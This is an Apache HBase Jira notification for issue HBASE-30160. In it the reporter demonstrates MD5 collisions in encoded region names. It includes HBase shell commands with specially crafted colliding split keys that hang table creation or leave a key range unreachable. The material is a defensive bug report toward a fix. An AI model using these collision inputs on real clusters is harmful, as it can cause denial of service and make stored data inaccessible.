[jira] [Comment Edited] (HBASE-30160) Prevent region creation if the encoded region names are the same

Balazs Meszaros (Jira) Wed, 13 May 2026 06:05:46 -0700


    [ 
https://issues.apache.org/jira/browse/HBASE-30160?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18080609#comment-18080609
 ]


Balazs Meszaros edited comment on HBASE-30160 at 5/13/26 1:03 PM:
------------------------------------------------------------------

I was able to exploit splitting, too:
{noformat}
create 'table1', 'f'
put 'table1', 'a', 'f', 123
put 'table1', 'z', 'f', 456

# split near 'm'
# it is important to split at the alphabetically second split-point 
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,115,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,191,153,109,68,64,204,231,44,114,222,191,210,195,217,184,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,178,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,193,104,134,161,17,252,189,152,121,37,167,113,223,160,193,70,2,4,136].pack('c*')

# the second split-point
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

ERROR: org.apache.hadoop.hbase.DoNotRetryIOException: 
54cbfe763235477aebe5a443bbd95cc6 NOT splittable

# it failed for some reason, but the next try later succeeded
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

# scan
scan 'table1'
ROW  COLUMN+CELL
 a column=f:, timestamp=2026-05-13T14:40:06.557, value=123
 z column=f:, timestamp=2026-05-13T14:40:12.133, value=456

ERROR: No location found for 'table1', 
row='m\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF60\x94\x0A\x84\x96o\x1F\xFFk\x0B\xCEQ\xDF\xF5srZ\x8A\xF3\xF0\x93\xFBC!\x029\xBE\xC960\xDA^\xE3\xD0\xE3\xDC\xA4+N\x87\xBE\xF0C\xE4?\x99mD@\xCC\xE7,r\xDE\xBF\xD2\xC3\xD98g\xDB\xDB\x1Ab7\xE97\x88\xA6
 \xE8\x0D\xF7~\xE6%\xAD\xA5+N\x8192\x18\xF5 
\x15\xE1\x17\x15\xC1X"}\x1E\xC7S\xDE\xF9e;S\xB6\xC9S\xA1\xCFcAi\x86\xA1\x11\xFC\xBD\x98y%\xA7q\xDF\xA0AF\x02\x04\x88',
 locateType=CURRENT

For usage try 'help "scan"'

Took 8.2603 seconds
{noformat}
I don't know if I can offline a region and make some keys inaccessible with 
this approach.


was (Author: balazs.meszaros):
I was able to exploit splitting, too:
{noformat}
create 'table1', 'f'
put 'table1', 'a', 'f', 123
put 'table1', 'z', 'f', 456

# split near 'm'
# it is important to add the alphabetically first split-point 
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,115,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,191,153,109,68,64,204,231,44,114,222,191,210,195,217,184,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,178,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,193,104,134,161,17,252,189,152,121,37,167,113,223,160,193,70,2,4,136].pack('c*')

# the second split-point
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

ERROR: org.apache.hadoop.hbase.DoNotRetryIOException: 
54cbfe763235477aebe5a443bbd95cc6 NOT splittable

# it failed for some reason, but the next try later succeeded
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

# scan
scan 'table1'
ROW  COLUMN+CELL
 a column=f:, timestamp=2026-05-13T14:40:06.557, value=123
 z column=f:, timestamp=2026-05-13T14:40:12.133, value=456

ERROR: No location found for 'table1', 
row='m\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF60\x94\x0A\x84\x96o\x1F\xFFk\x0B\xCEQ\xDF\xF5srZ\x8A\xF3\xF0\x93\xFBC!\x029\xBE\xC960\xDA^\xE3\xD0\xE3\xDC\xA4+N\x87\xBE\xF0C\xE4?\x99mD@\xCC\xE7,r\xDE\xBF\xD2\xC3\xD98g\xDB\xDB\x1Ab7\xE97\x88\xA6
 \xE8\x0D\xF7~\xE6%\xAD\xA5+N\x8192\x18\xF5 
\x15\xE1\x17\x15\xC1X"}\x1E\xC7S\xDE\xF9e;S\xB6\xC9S\xA1\xCFcAi\x86\xA1\x11\xFC\xBD\x98y%\xA7q\xDF\xA0AF\x02\x04\x88',
 locateType=CURRENT

For usage try 'help "scan"'

Took 8.2603 seconds
{noformat}
I don't know if I can offline a region and make some keys inaccessible with 
this approach.

> Prevent region creation if the encoded region names are the same
> ----------------------------------------------------------------
>
>                 Key: HBASE-30160
>                 URL: https://issues.apache.org/jira/browse/HBASE-30160
>             Project: HBase
>          Issue Type: Sub-task
>            Reporter: Balazs Meszaros
>            Priority: Major
>
> HBase region names are hashed like this: MD5(tableName,startKey,...). With a 
> special startKey we can create collisions easily, like this:
> {noformat}
> hbase:001:0> create 'table1', 'f', SPLITS => 
> ["\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^B\xb9\x99\xdb\xb7\x98W\xfa\xa1\xe0\xf1\xbc\x09h]1S[&u*\x93\xa1&RzF\x87\x9e\x970\x84\xe5\xb9\xe3ln*l\x07\x0c\xef\x03\x96Q\xbdC!\xb1\xdec-\xfb+\x11\x83h\xc1\xbe$\x1f\xae\x95\xaf\xd3W\x07\x8a\x01\xfa\xf1\xba\x83\x8c}\xa5A1\x83\xae\xae\xf8\xe6\xf9\xe5F\xa7\xc9\x1a\xfeM\xec\x07\xdem\x0em\x9e\x97\xf4\x16\x08\x94\xa8\x8a87\x07\xb5v\xac\xe7\x07\x10\x22\xfc\xb9\x1fm\xbd\x13V\xa9\xedX\xf0\xb1",
>  
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^B\xb9\x99\xdb\xb7\x98W\xfa\xa1\xe0\xf1\xbc\x09h]1S[\xa6u*\x93\xa1&RzF\x87\x9e\x970\x84\xe5\xb9\xe3ln*l\x07\x0c\xef\x03\x96\xd1\xbcC!\xb1\xdec-\xfb+\x11\x83h\xc1>$\x1f\xae\x95\xaf\xd3W\x07\x8a\x01\xfa\xf1\xba\x83\x8c}\xa5A1\x83\xae\xae\xf8f\xf9\xe5F\xa7\xc9\x1a\xfeM\xec\x07\xdem\x0em\x9e\x97\xf4\x16\x08\x94\xa8\x8a87\x075w\xac\xe7\x07\x10\x22\xfc\xb9\x1fm\xbd\x13V)\xedX\xf0\xb1"]
> ERROR: The procedure 9 is still running
> For usage try 'help "create"'
> Took 608.8101 seconds
> {noformat}
> The table creation fails, because hashes are the same:
> {noformat}
> 2026-05-13 09:34:23,762 INFO  org.apache.hadoop.hbase.regionserver.HRegion: 
> [RegionOpenAndInit-table1-pool-2]: creating {ENCODED => 
> 647314dfe2b7e604e08fd7fd3fec44fc, NAME => 'table1,...
> 2026-05-13 09:34:23,764 INFO  org.apache.hadoop.hbase.regionserver.HRegion: 
> [RegionOpenAndInit-table1-pool-1]: creating {ENCODED => 
> 647314dfe2b7e604e08fd7fd3fec44fc, NAME => 'table1,...
> 2026-05-13 09:34:23,772 WARN  org.apache.hadoop.hdfs.DataStreamer: 
> [Thread-140]: DataStreamer Exception
> java.io.FileNotFoundException: File does not exist: 
> /hbase/data/default/table1/647314dfe2b7e604e08fd7fd3fec44fc/.regioninfo 
> (inode 16653) [Lease.  Holder: DFSClient_NONMAPREDUCE_1353520776_1, pending 
> creates: 3]
>         at 
> org.apache.hadoop.hdfs.server.namenode.FSNamesystem.checkLease(FSNamesystem.java:3194)
>         at 
> org.apache.hadoop.hdfs.server.namenode.FSDirWriteFileOp.analyzeFileState(FSDirWriteFileOp.java:609)
> ...
> {noformat}
> The procedure never finishes and prohibits further creation of {{table1}}.
> This issue should be triggered with splitting the table twice:
> {noformat}
> split 'table1', 'malicious-key1'
> split 'table1', 'malicious-key2'
> {noformat}
> It would be hard to change MD5 to something else, but we should handle these 
> collisions better. We should check if the region hashes are the same and fail 
> immediately. Under normal circumstances, the chance of a collision with 
> automatic splitting is very-very-low.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

[jira] [Comment Edited] (HBASE-30160) Prevent region creation if the encoded region names are the same

Reply via email to